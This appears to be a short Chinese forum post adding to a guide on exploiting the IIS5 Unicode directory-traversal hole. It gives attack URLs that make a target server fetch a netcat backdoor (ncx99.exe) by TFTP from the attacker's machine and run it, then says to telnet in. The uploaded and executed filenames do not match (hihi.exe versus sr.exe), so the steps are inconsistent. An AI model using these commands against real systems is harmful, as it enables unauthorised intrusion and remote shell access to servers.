IIS5 UNICODE 编码漏洞的利用心得补充

80酷酷网    80kuku.com

  iis|编码|心得看了你的文章【unicode】写的很好,
我来说说用tftp怎么搞:
下载http://www.cners.com/tools/unicode.zip(下载快着呢)
解压:
tftpd32.exe
ncx99.exe

本机运行tftpd32.exe
再(接着你的来):

http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c:\\inetpub\\scripts\\hihi.exe

注意了:这是将你本机的ncx99.exe 上传到对方的 scripts下!
下面执行它:
http://192.168.8.48/scripts/ccc.exe?/c+c:\inetpub\scripts\sr.exe

这时在你的tftp上就能看到对方ip的信息了!

下面可以干的就不用说了!

用telnet 或SecureCRT.EXE软件登陆192.168.8.48就可以了!(推荐用SecureCrt)

{
零点
http://www.net7b.com{我的站点}
http://www.net7b.com/net7b_heike(网络奇兵网络安全中心)

分享到
  • 微信分享
  • 新浪微博
  • QQ好友
  • QQ空间
点击: